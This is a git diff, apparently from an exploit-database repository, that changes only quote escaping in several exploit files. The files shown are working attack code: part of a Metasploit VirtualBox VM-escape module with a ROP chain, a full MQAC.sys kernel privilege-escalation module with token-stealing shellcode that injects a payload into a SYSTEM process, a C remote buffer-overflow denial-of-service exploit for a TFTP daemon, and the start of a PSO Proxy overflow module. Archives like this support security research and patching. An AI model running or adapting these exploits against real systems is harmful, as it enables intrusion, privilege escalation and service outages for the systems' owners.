msg[32, 4] = [buff_length].pack(\"V\") # size_of(buf) - msg[36, 4] = [buff_addr].pack(\"V\") # (buf) + msg[4, 4] = [@client_id].pack("V") # u32ClientID + msg[8, 4] = [SHCRGL_GUEST_FN_INJECT].pack("V") + msg[12, 4] = [SHCRGL_CPARMS_INJECT].pack("V") + msg[16, 4] = [VMM_DEV_HGCM_PARM_TYPE_32_BIT].pack("V") + msg[20, 4] = [@client_id].pack("V") # u32ClientID + msg[28, 4] = [VMM_DEV_HGCM_PARM_TYPE_LIN_ADDR].pack("V") + msg[32, 4] = [buff_length].pack("V") # size_of(buf) + msg[36, 4] = [buff_addr].pack("V") # (buf) result = send_ioctl(VBOXGUEST_IOCTL_HGCM_CALL, msg) @@ -201,9 +201,9 @@ class Metasploit3 < Msf::Exploit::Local end def stack_adjustment - pivot = \"\\x65\\x8b\\x04\\x25\\x10\\x00\\x00\\x00\" # \"mov eax,dword ptr gs:[10h]\" # Get Stack Bottom from TEB - pivot << \"\\x89\\xc4\" # mov esp, eax # Store stack bottom in esp - pivot << \"\\x81\\xC4\\x30\\xF8\\xFF\\xFF\" # add esp, -2000 # Plus a little offset... + pivot = "\x65\x8b\x04\x25\x10\x00\x00\x00" # "mov eax,dword ptr gs:[10h]" # Get Stack Bottom from TEB + pivot << "\x89\xc4" # mov esp, eax # Store stack bottom in esp + pivot << "\x81\xC4\x30\xF8\xFF\xFF" # add esp, -2000 # Plus a little offset... pivot end @@ -222,30 +222,30 @@ class Metasploit3 < Msf::Exploit::Local # See at the end of the module for a better description of the ROP Chain, # or even better, read: http://www.vupen.com/blog/20140725.Advanced_Exploitation_VirtualBox_VM_Escape.php # All gadgets from VBoxREM.dll - opcodes_data = [0x8, 0x30, 0x331].pack(\"V*\") + opcodes_data = [0x8, 0x30, 0x331].pack("V*") - opcodes_data << [0x6a68599a].pack(\"Q<\") # Gadget 2 # pop rdx # xor ecx,dword ptr [rax] # add cl,cl # movzx eax,al # ret - opcodes_data << [112].pack(\"Q<\") # RDX - opcodes_data << [0x6a70a560].pack(\"Q<\") # Gadget 3 # lea rax,[rsp+8] # ret - opcodes_data << [0x6a692b1c].pack(\"Q<\") # Gadget 4 # lea rax,[rdx+rax] # ret - opcodes_data << [0x6a6931d6].pack(\"Q<\") # Gadget 5 # add dword ptr [rax],eax # add cl,cl # ret - opcodes_data << [0x6a68124e].pack(\"Q<\") # Gadget 6 # pop r12 # ret - opcodes_data << [0x6A70E822].pack(\"Q<\") # R12 := ptr to .data in VBoxREM.dll (4th argument lpflOldProtect) - opcodes_data << [0x6a70927d].pack(\"Q<\") # Gadget 8 # mov r9,r12 # mov r8d,dword ptr [rsp+8Ch] # mov rdx,qword ptr [rsp+68h] # mov rdx,qword ptr [rsp+68h] # call rbp + opcodes_data << [0x6a68599a].pack("Q<") # Gadget 2 # pop rdx # xor ecx,dword ptr [rax] # add cl,cl # movzx eax,al # ret + opcodes_data << [112].pack("Q<") # RDX + opcodes_data << [0x6a70a560].pack("Q<") # Gadget 3 # lea rax,[rsp+8] # ret + opcodes_data << [0x6a692b1c].pack("Q<") # Gadget 4 # lea rax,[rdx+rax] # ret + opcodes_data << [0x6a6931d6].pack("Q<") # Gadget 5 # add dword ptr [rax],eax # add cl,cl # ret + opcodes_data << [0x6a68124e].pack("Q<") # Gadget 6 # pop r12 # ret + opcodes_data << [0x6A70E822].pack("Q<") # R12 := ptr to .data in VBoxREM.dll (4th argument lpflOldProtect) + opcodes_data << [0x6a70927d].pack("Q<") # Gadget 8 # mov r9,r12 # mov r8d,dword ptr [rsp+8Ch] # mov rdx,qword ptr [rsp+68h] # mov rdx,qword ptr [rsp+68h] # call rbp opcodes_data << Rex::Text.pattern_create(80) - opcodes_data << [0].pack(\"Q<\") # 1st arg (lpAddress) # chain will store stack address here + opcodes_data << [0].pack("Q<") # 1st arg (lpAddress) # chain will store stack address here opcodes_data << Rex::Text.pattern_create(104 - 80 - 8) - opcodes_data << [0x2000].pack(\"Q<\") # 2nd arg (dwSize) + opcodes_data << [0x2000].pack("Q<") # 2nd arg (dwSize) opcodes_data << Rex::Text.pattern_create(140 - 104 - 8) - opcodes_data << [0x40].pack(\"V\") # 3rd arg (flNewProtect) + opcodes_data << [0x40].pack("V") # 3rd arg (flNewProtect) opcodes_data << Rex::Text.pattern_create(252 - 4 - 140 - 64) - opcodes_data << [0x6A70BB20].pack(\"V\") # ptr to jmp VirtualProtect instr. - opcodes_data << \"A\" * 8 - opcodes_data << [0x6a70a560].pack(\"Q<\") # Gadget 9 - opcodes_data << [0x6a6c9d3d].pack(\"Q<\") # Gadget 10 - opcodes_data << \"\\xe9\\x5b\\x02\\x00\\x00\" # jmp $+608 - opcodes_data << \"A\" * (624 - 24 - 5) - opcodes_data << [0x6a682a2a].pack(\"Q<\") # Gadget 1 # xchg eax, esp # ret # stack pivot + opcodes_data << [0x6A70BB20].pack("V") # ptr to jmp VirtualProtect instr. + opcodes_data << "A" * 8 + opcodes_data << [0x6a70a560].pack("Q<") # Gadget 9 + opcodes_data << [0x6a6c9d3d].pack("Q<") # Gadget 10 + opcodes_data << "\xe9\x5b\x02\x00\x00" # jmp $+608 + opcodes_data << "A" * (624 - 24 - 5) + opcodes_data << [0x6a682a2a].pack("Q<") # Gadget 1 # xchg eax, esp # ret # stack pivot opcodes_data << stack_adjustment opcodes_data << payload.encoded opcodes_data << Rex::Text.pattern_create(8196 - opcodes_data.length) @@ -256,11 +256,11 @@ class Metasploit3 < Msf::Exploit::Local # not reused until the second packet arrives. The second packet, # of course, must have 8196 bytes length too. So this memory is # reused and code execution can be accomplished. - opcodes_data = [0x8, 0x30, 0x331, 0x2a9].pack(\"V*\") - opcodes_data << \"B\" * (8196 - opcodes_data.length) + opcodes_data = [0x8, 0x30, 0x331, 0x2a9].pack("V*") + opcodes_data << "B" * (8196 - opcodes_data.length) end - msg = opcodes_hdr.pack(\"V*\") + opcodes.pack(\"C*\") + opcodes_data + msg = opcodes_hdr.pack("V*") + opcodes.pack("C*") + opcodes_data msg end @@ -287,53 +287,53 @@ class Metasploit3 < Msf::Exploit::Local def exploit unless self.respond_to?(target[:messages]) - print_error(\"Invalid target specified: no messages callback function defined\") + print_error("Invalid target specified: no messages callback function defined") return end - print_status(\"Opening device...\") + print_status("Opening device...") @handle = open_device if @handle.nil? - fail_with(Failure::NoTarget, \"#{DEVICE} device not found\") + fail_with(Failure::NoTarget, "#{DEVICE} device not found") else - print_good(\"#{DEVICE} found, exploiting...\") + print_good("#{DEVICE} found, exploiting...") end - print_status(\"Connecting to the service...\") + print_status("Connecting to the service...") @client_id = connect if @client_id.nil? - fail_with(Failure::Unknown, \"Connect operation failed\") + fail_with(Failure::Unknown, "Connect operation failed") end - print_good(\"Client ID #{@client_id}\") + print_good("Client ID #{@client_id}") - print_status(\"Calling SET_VERSION...\") + print_status("Calling SET_VERSION...") result = set_version if result.nil? - fail_with(Failure::Unknown, \"Failed to SET_VERSION\") + fail_with(Failure::Unknown, "Failed to SET_VERSION") end this_pid = session.sys.process.getpid - print_status(\"Calling SET_PID...\") + print_status("Calling SET_PID...") result = set_pid(this_pid) if result.nil? - fail_with(Failure::Unknown, \"Failed to SET_PID\") + fail_with(Failure::Unknown, "Failed to SET_PID") end this_proc = session.sys.process.open - print_status(\"Sending First 0xEA Opcode Message to control head_spu...\") + print_status("Sending First 0xEA Opcode Message to control head_spu...") result = send_opcodes_msg(this_proc, 1) if result.nil? - fail_with(Failure::Unknown, \"Failed to control heap_spu...\") + fail_with(Failure::Unknown, "Failed to control heap_spu...") end - print_status(\"Sending Second 0xEA Opcode Message to execute payload...\") + print_status("Sending Second 0xEA Opcode Message to execute payload...") @old_timeout = session.response_timeout session.response_timeout = 5 begin send_opcodes_msg(this_proc, 2) rescue Rex::TimeoutError - vprint_status(\"Expected timeout in case of successful exploitation\") + vprint_status("Expected timeout in case of successful exploitation") end end @@ -348,12 +348,12 @@ class Metasploit3 < Msf::Exploit::Local end unless @client_id.nil? - print_status(\"Disconnecting from the service...\") + print_status("Disconnecting from the service...") disconnect end unless @handle.nil? - print_status(\"Closing the device...\") + print_status("Closing the device...") session.railgun.kernel32.CloseHandle(@handle) end end diff --git a/platforms/win_x86/local/34167.rb b/platforms/win_x86/local/34167.rb index ca641fb43..8a86a5c8b 100755 --- a/platforms/win_x86/local/34167.rb +++ b/platforms/win_x86/local/34167.rb @@ -3,8 +3,8 @@ # Current source: https://github.com/rapid7/metasploit-framework ## -require \'msf/core\' -require \'rex\' +require 'msf/core' +require 'rex' class Metasploit3 < Msf::Exploit::Local Rank = AverageRanking @@ -14,64 +14,64 @@ class Metasploit3 < Msf::Exploit::Local def initialize(info={}) super(update_info(info, { - \'Name\' => \'MQAC.sys Arbitrary Write Privilege Escalation\', - \'Description\' => %q{ + 'Name' => 'MQAC.sys Arbitrary Write Privilege Escalation', + 'Description' => %q{ A vulnerability within the MQAC.sys module allows an attacker to overwrite an arbitrary location in kernel memory. This module will elevate itself to SYSTEM, then inject the payload into another SYSTEM process. }, - \'License\' => MSF_LICENSE, - \'Author\' => + 'License' => MSF_LICENSE, + 'Author' => [ - \'Matt Bergin\', # original exploit and all the hard work - \'Spencer McIntyre\' # MSF module + 'Matt Bergin', # original exploit and all the hard work + 'Spencer McIntyre' # MSF module ], - \'Arch\' => [ ARCH_X86 ], - \'Platform\' => [ \'win\' ], - \'SessionTypes\' => [ \'meterpreter\' ], - \'DefaultOptions\' => + 'Arch' => [ ARCH_X86 ], + 'Platform' => [ 'win' ], + 'SessionTypes' => [ 'meterpreter' ], + 'DefaultOptions' => { - \'EXITFUNC\' => \'thread\', + 'EXITFUNC' => 'thread', }, - \'Targets\' => + 'Targets' => [ - [ \'Windows XP SP3\', + [ 'Windows XP SP3', { - \'_KPROCESS\' => \"\\x44\", - \'_TOKEN\' => \"\\xc8\", - \'_UPID\' => \"\\x84\", - \'_APLINKS\' => \"\\x88\" + '_KPROCESS' => "\x44", + '_TOKEN' => "\xc8", + '_UPID' => "\x84", + '_APLINKS' => "\x88" } ], ], - \'References\' => + 'References' => [ - [ \'CVE\', \'2014-4971\' ], - [ \'EDB\', \'34112\' ], - [ \'URL\', \'https://www.korelogic.com/Resources/Advisories/KL-001-2014-003.txt\' ] + [ 'CVE', '2014-4971' ], + [ 'EDB', '34112' ], + [ 'URL', 'https://www.korelogic.com/Resources/Advisories/KL-001-2014-003.txt' ] ], - \'DisclosureDate\'=> \'Jul 22 2014\', - \'DefaultTarget\' => 0 + 'DisclosureDate'=> 'Jul 22 2014', + 'DefaultTarget' => 0 })) end def find_sys_base(drvname) - session.railgun.add_dll(\'psapi\') if not session.railgun.dlls.keys.include?(\'psapi\') - session.railgun.add_function(\'psapi\', \'EnumDeviceDrivers\', \'BOOL\', [ [\"PBLOB\", \"lpImageBase\", \"out\"], [\"DWORD\", \"cb\", \"in\"], [\"PDWORD\", \"lpcbNeeded\", \"out\"]]) - session.railgun.add_function(\'psapi\', \'GetDeviceDriverBaseNameA\', \'DWORD\', [ [\"LPVOID\", \"ImageBase\", \"in\"], [\"PBLOB\", \"lpBaseName\", \"out\"], [\"DWORD\", \"nSize\", \"in\"]]) + session.railgun.add_dll('psapi') if not session.railgun.dlls.keys.include?('psapi') + session.railgun.add_function('psapi', 'EnumDeviceDrivers', 'BOOL', [ ["PBLOB", "lpImageBase", "out"], ["DWORD", "cb", "in"], ["PDWORD", "lpcbNeeded", "out"]]) + session.railgun.add_function('psapi', 'GetDeviceDriverBaseNameA', 'DWORD', [ ["LPVOID", "ImageBase", "in"], ["PBLOB", "lpBaseName", "out"], ["DWORD", "nSize", "in"]]) results = session.railgun.psapi.EnumDeviceDrivers(4096, 1024, 4) - addresses = results[\'lpImageBase\'][0..results[\'lpcbNeeded\'] - 1].unpack(\"L*\") + addresses = results['lpImageBase'][0..results['lpcbNeeded'] - 1].unpack("L*") addresses.each do |address| results = session.railgun.psapi.GetDeviceDriverBaseNameA(address, 48, 48) - current_drvname = results[\'lpBaseName\'][0..results[\'return\'] - 1] + current_drvname = results['lpBaseName'][0..results['return'] - 1] if drvname == nil - if current_drvname.downcase.include?(\'krnl\') + if current_drvname.downcase.include?('krnl') return [address, current_drvname] end - elsif drvname == results[\'lpBaseName\'][0..results[\'return\'] - 1] + elsif drvname == results['lpBaseName'][0..results['return'] - 1] return [address, current_drvname] end end @@ -80,29 +80,29 @@ class Metasploit3 < Msf::Exploit::Local # Function borrowed from smart_hashdump def get_system_proc # Make sure you got the correct SYSTEM Account Name no matter the OS Language - local_sys = resolve_sid(\"S-1-5-18\") - system_account_name = \"#{local_sys[:domain]}\\\\#{local_sys[:name]}\" + local_sys = resolve_sid("S-1-5-18") + system_account_name = "#{local_sys[:domain]}\\#{local_sys[:name]}" this_pid = session.sys.process.getpid # Processes that can Blue Screen a host if migrated in to - dangerous_processes = [\"lsass.exe\", \"csrss.exe\", \"smss.exe\"] + dangerous_processes = ["lsass.exe", "csrss.exe", "smss.exe"] session.sys.process.processes.each do |p| # Check we are not migrating to a process that can BSOD the host - next if dangerous_processes.include?(p[\"name\"]) - next if p[\"pid\"] == this_pid - next if p[\"pid\"] == 4 - next if p[\"user\"] != system_account_name + next if dangerous_processes.include?(p["name"]) + next if p["pid"] == this_pid + next if p["pid"] == 4 + next if p["user"] != system_account_name return p end end def open_device - handle = session.railgun.kernel32.CreateFileA(\"\\\\\\\\.\\\\MQAC\", \"FILE_SHARE_WRITE|FILE_SHARE_READ\", 0, nil, \"OPEN_EXISTING\", 0, nil) - if handle[\'return\'] == 0 - print_error(\'Failed to open the \\\\\\\\.\\\\MQAC device\') + handle = session.railgun.kernel32.CreateFileA("\\\\.\\MQAC", "FILE_SHARE_WRITE|FILE_SHARE_READ", 0, nil, "OPEN_EXISTING", 0, nil) + if handle['return'] == 0 + print_error('Failed to open the \\\\.\\MQAC device') return nil end - handle = handle[\'return\'] + handle = handle['return'] end def check @@ -112,7 +112,7 @@ class Metasploit3 < Msf::Exploit::Local end session.railgun.kernel32.CloseHandle(handle) - os = sysinfo[\"OS\"] + os = sysinfo["OS"] case os when /windows xp.*service pack 3/i return Exploit::CheckCode::Appears @@ -124,79 +124,79 @@ class Metasploit3 < Msf::Exploit::Local end def exploit - if sysinfo[\"Architecture\"] =~ /wow64/i - print_error(\"Running against WOW64 is not supported\") + if sysinfo["Architecture"] =~ /wow64/i + print_error("Running against WOW64 is not supported") return - elsif sysinfo[\"Architecture\"] =~ /x64/ - print_error(\"Running against 64-bit systems is not supported\") + elsif sysinfo["Architecture"] =~ /x64/ + print_error("Running against 64-bit systems is not supported") return end if is_system? - print_error(\"This meterpreter session is already running as SYSTEM\") + print_error("This meterpreter session is already running as SYSTEM") return end kernel_info = find_sys_base(nil) base_addr = 0xffff - print_status(\"Kernel Base Address: 0x#{kernel_info[0].to_s(16)}\") + print_status("Kernel Base Address: 0x#{kernel_info[0].to_s(16)}") handle = open_device return if handle.nil? this_proc = session.sys.process.open unless this_proc.memory.writable?(base_addr) - session.railgun.ntdll.NtAllocateVirtualMemory(-1, [ 1 ].pack(\"L\"), nil, [ 0xffff ].pack(\"L\"), \"MEM_COMMIT|MEM_RESERVE\", \"PAGE_EXECUTE_READWRITE\") + session.railgun.ntdll.NtAllocateVirtualMemory(-1, [ 1 ].pack("L"), nil, [ 0xffff ].pack("L"), "MEM_COMMIT|MEM_RESERVE", "PAGE_EXECUTE_READWRITE") end unless this_proc.memory.writable?(base_addr) - print_error(\'Failed to properly allocate memory\') + print_error('Failed to properly allocate memory') this_proc.close return end hKernel = session.railgun.kernel32.LoadLibraryExA(kernel_info[1], 0, 1) - hKernel = hKernel[\'return\'] - halDispatchTable = session.railgun.kernel32.GetProcAddress(hKernel, \"HalDispatchTable\") - halDispatchTable = halDispatchTable[\'return\'] + hKernel = hKernel['return'] + halDispatchTable = session.railgun.kernel32.GetProcAddress(hKernel, "HalDispatchTable") + halDispatchTable = halDispatchTable['return'] halDispatchTable -= hKernel halDispatchTable += kernel_info[0] - print_status(\"HalDisPatchTable Address: 0x#{halDispatchTable.to_s(16)}\") + print_status("HalDisPatchTable Address: 0x#{halDispatchTable.to_s(16)}") - tokenstealing = \"\\x52\" # push edx # Save edx on the stack - tokenstealing << \"\\x53\" # push ebx # Save ebx on the stack - tokenstealing << \"\\x33\\xc0\" # xor eax, eax # eax = 0 - tokenstealing << \"\\x64\\x8b\\x80\\x24\\x01\\x00\\x00\" # mov eax, dword ptr fs:[eax+124h] # Retrieve ETHREAD - tokenstealing << \"\\x8b\\x40\" + target[\'_KPROCESS\'] # mov eax, dword ptr [eax+44h] # Retrieve _KPROCESS - tokenstealing << \"\\x8b\\xc8\" # mov ecx, eax - tokenstealing << \"\\x8b\\x98\" + target[\'_TOKEN\'] + \"\\x00\\x00\\x00\" # mov ebx, dword ptr [eax+0C8h] # Retrieves TOKEN - tokenstealing << \"\\x8b\\x80\" + target[\'_APLINKS\'] + \"\\x00\\x00\\x00\" # mov eax, dword ptr [eax+88h] <====| # Retrieve FLINK from ActiveProcessLinks - tokenstealing << \"\\x81\\xe8\" + target[\'_APLINKS\'] + \"\\x00\\x00\\x00\" # sub eax,88h | # Retrieve _EPROCESS Pointer from the ActiveProcessLinks - tokenstealing << \"\\x81\\xb8\" + target[\'_UPID\'] + \"\\x00\\x00\\x00\\x04\\x00\\x00\\x00\" # cmp dword ptr [eax+84h], 4 | # Compares UniqueProcessId with 4 (The System Process on Windows XP) - tokenstealing << \"\\x75\\xe8\" # jne 0000101e ====================== - tokenstealing << \"\\x8b\\x90\" + target[\'_TOKEN\'] + \"\\x00\\x00\\x00\" # mov edx,dword ptr [eax+0C8h] # Retrieves TOKEN and stores on EDX - tokenstealing << \"\\x8b\\xc1\" # mov eax, ecx # Retrieves KPROCESS stored on ECX - tokenstealing << \"\\x89\\x90\" + target[\'_TOKEN\'] + \"\\x00\\x00\\x00\" # mov dword ptr [eax+0C8h],edx # Overwrites the TOKEN for the current KPROCESS - tokenstealing << \"\\x5b\" # pop ebx # Restores ebx - tokenstealing << \"\\x5a\" # pop edx # Restores edx - tokenstealing << \"\\xc2\\x10\" # ret 10h # Away from the kernel! + tokenstealing = "\x52" # push edx # Save edx on the stack + tokenstealing << "\x53" # push ebx # Save ebx on the stack + tokenstealing << "\x33\xc0" # xor eax, eax # eax = 0 + tokenstealing << "\x64\x8b\x80\x24\x01\x00\x00" # mov eax, dword ptr fs:[eax+124h] # Retrieve ETHREAD + tokenstealing << "\x8b\x40" + target['_KPROCESS'] # mov eax, dword ptr [eax+44h] # Retrieve _KPROCESS + tokenstealing << "\x8b\xc8" # mov ecx, eax + tokenstealing << "\x8b\x98" + target['_TOKEN'] + "\x00\x00\x00" # mov ebx, dword ptr [eax+0C8h] # Retrieves TOKEN + tokenstealing << "\x8b\x80" + target['_APLINKS'] + "\x00\x00\x00" # mov eax, dword ptr [eax+88h] <====| # Retrieve FLINK from ActiveProcessLinks + tokenstealing << "\x81\xe8" + target['_APLINKS'] + "\x00\x00\x00" # sub eax,88h | # Retrieve _EPROCESS Pointer from the ActiveProcessLinks + tokenstealing << "\x81\xb8" + target['_UPID'] + "\x00\x00\x00\x04\x00\x00\x00" # cmp dword ptr [eax+84h], 4 | # Compares UniqueProcessId with 4 (The System Process on Windows XP) + tokenstealing << "\x75\xe8" # jne 0000101e ====================== + tokenstealing << "\x8b\x90" + target['_TOKEN'] + "\x00\x00\x00" # mov edx,dword ptr [eax+0C8h] # Retrieves TOKEN and stores on EDX + tokenstealing << "\x8b\xc1" # mov eax, ecx # Retrieves KPROCESS stored on ECX + tokenstealing << "\x89\x90" + target['_TOKEN'] + "\x00\x00\x00" # mov dword ptr [eax+0C8h],edx # Overwrites the TOKEN for the current KPROCESS + tokenstealing << "\x5b" # pop ebx # Restores ebx + tokenstealing << "\x5a" # pop edx # Restores edx + tokenstealing << "\xc2\x10" # ret 10h # Away from the kernel! shellcode = make_nops(0x200) + tokenstealing this_proc.memory.write(0x1, shellcode) this_proc.close - print_status(\"Triggering vulnerable IOCTL\") + print_status("Triggering vulnerable IOCTL") session.railgun.ntdll.NtDeviceIoControlFile(handle, 0, 0, 0, 4, 0x1965020f, 1, 0x258, halDispatchTable + 0x4, 0) result = session.railgun.ntdll.NtQueryIntervalProfile(1337, 4) unless is_system? - print_error(\"Exploit failed\") + print_error("Exploit failed") return end proc = get_system_proc - print_status(\"Injecting the payload into SYSTEM process: #{proc[\'name\']}\") - unless execute_shellcode(payload.encoded, nil, proc[\'pid\']) - fail_with(Failure::Unknown, \"Error while executing the payload\") + print_status("Injecting the payload into SYSTEM process: #{proc['name']}") + unless execute_shellcode(payload.encoded, nil, proc['pid']) + fail_with(Failure::Unknown, "Error while executing the payload") end end diff --git a/platforms/windows/dos/10603.c b/platforms/windows/dos/10603.c index b2c00c3c8..dcb6c6fb0 100755 --- a/platforms/windows/dos/10603.c +++ b/platforms/windows/dos/10603.c @@ -14,43 +14,43 @@ #include #include -#pragma comment(lib, \"ws2_32.lib\") +#pragma comment(lib, "ws2_32.lib") char Buffer_Overflow[] = -\"\\x00\\x02\" -\"\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\" // A = 41. 300 bytes... -\"\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\" -\"\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\" -\"\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\" -\"\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\" -\"\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\" -\"\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\" -\"\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\" -\"\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\" -\"\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\" -\"\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\" -\"\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\" -\"\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\" -\"\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\" -\"\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\" -\"\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\" -\"\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\" -\"\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\" -\"\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\" -\"\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\" -\"\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\" -\"\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\" -\"\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\" -\"\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\" -\"\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\" -\"\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\" -\"\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\" -\"\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\" -\"\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\" -\"\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\\x41\" -\"\\0\" -\"netascii\" -\"\\0\"; +"\x00\x02" +"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" // A = 41. 300 bytes... +"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" +"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" +"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" +"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" +"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" +"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" +"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" +"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" +"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" +"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" +"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" +"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" +"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" +"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" +"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" +"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" +"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" +"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" +"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" +"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" +"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" +"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" +"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" +"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" +"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" +"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" +"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" +"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" +"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41" +"\0" +"netascii" +"\0"; void main(int argc, char *argv[]) { @@ -62,52 +62,52 @@ SOCKET mysocket; int destPORT = 69; if (argc < 2){ -printf(\"\\nVulnerability: Remote Buffer Overflow Exploit\\n\"); -printf(\"Impact: Remote Denial of Service Attack\\n\"); -printf(\"Vulnerable Application: TFTP Daemon Version 1.9\\n\"); -printf(\"\\nAuthor: Socket_0x03\\n\"); -printf(\"Contact: Socket_0x03 (at) teraexe (dot) com [email concealed]\\n\"); -printf(\"Website: www.teraexe.com\\n\"); -printf(\"\\nUsage: exploit + IP Address\\n\"); -printf(\"Example: exploit 192.168.1.100\\n\"); +printf("\nVulnerability: Remote Buffer Overflow Exploit\n"); +printf("Impact: Remote Denial of Service Attack\n"); +printf("Vulnerable Application: TFTP Daemon Version 1.9\n"); +printf("\nAuthor: Socket_0x03\n"); +printf("Contact: Socket_0x03 (at) teraexe (dot) com [email concealed]\n"); +printf("Website: www.teraexe.com\n"); +printf("\nUsage: exploit + IP Address\n"); +printf("Example: exploit 192.168.1.100\n"); return; } wVersionRequested = MAKEWORD(1, 1); if (WSAStartup(wVersionRequested, &wsaData) < 0) { -printf(\"No winsock suitable version found!\"); +printf("No winsock suitable version found!"); return; } mysocket = socket(AF_INET, SOCK_DGRAM , 0); if(mysocket==INVALID_SOCKET){ -printf(\"Error: Cannot create a socket.\\n\"); +printf("Error: Cannot create a socket.\n"); exit(1); } -printf(\"Resolving IP Address.\\n\"); +printf("Resolving IP Address.\n"); if ((pTarget = gethostbyname(argv[2])) == NULL){ -printf(\"Error: Resolve of %s failed.\\n\", argv[1]); +printf("Error: Resolve of %s failed.\n", argv[1]); exit(1); } memcpy(&sock.sin_addr.s_addr, pTarget->h_addr, pTarget->h_length); sock.sin_family = AF_INET; sock.sin_port = htons(destPORT); -printf(\"Connecting to Daemon 1.9\\n\"); +printf("Connecting to Daemon 1.9\n"); if ( (connect(mysocket, (struct sockaddr *)&sock, sizeof (sock) ))){ -printf(\"Error: Could not connect to TFTP Daemon\\n\"); +printf("Error: Could not connect to TFTP Daemon\n"); exit(1); } -printf(\"Connection Completed.\\n\"); +printf("Connection Completed.\n"); Sleep(10); -printf(\"Sending packet.\\n\"); +printf("Sending packet.\n"); if (send(mysocket,Buffer_Overflow, sizeof(Buffer_Overflow)+1, 0) == -1){ -printf(\"Error sending packet.\\n\"); +printf("Error sending packet.\n"); closesocket(mysocket); exit(1); } -printf(\"Remote Buffer Overflow Completed.\\n\"); +printf("Remote Buffer Overflow Completed.\n"); closesocket(mysocket); WSACleanup(); @@ -117,7 +117,7 @@ WSACleanup(); Microsoft Windows XP [Versión 5.1.2600] (C) Copyright 1985-2001 Microsoft Corp. -C:\\>exploit +C:\>exploit Vulnerability: Remote Buffer Overflow Exploit Impact: Remote Denial of Service Attack @@ -130,12 +130,12 @@ Website: www.teraexe.com Usage: exploit + IP Address Example: exploit 192.168.1.100 -C:\\>exploit 192.168.1.101 +C:\>exploit 192.168.1.101 Resolving IP Address. Connecting to Daemon 1.9 Connection Completed. Sending packet. Remote Buffer Overflow Completed. -C:\\> +C:\> */ \ No newline at end of file diff --git a/platforms/windows/dos/16790.rb b/platforms/windows/dos/16790.rb index 0c2a8d91b..5b45849c3 100755 --- a/platforms/windows/dos/16790.rb +++ b/platforms/windows/dos/16790.rb @@ -18,43 +18,43 @@ class Metasploit3 < Msf::Exploit::Remote def initialize(info = {}) super(update_info(info, - \'Name\' => \'PSO Proxy v0.91 Stack Buffer Overflow\', - \'Description\' => %q{ + 'Name' => 'PSO Proxy v0.91 Stack Buffer Overflow', + 'Description' => %q{ This module exploits a buffer overflow in the PSO Proxy v0.91 web server. If a client sends an excessively long string the stack is overwritten. }, - \'Author\' => \'Patrick Webster \', - \'License\' => MSF_LICENSE, - \'Version\' => \'$Revision: 9262 $\', - \'References\' => + 'Author' => 'Patrick Webster 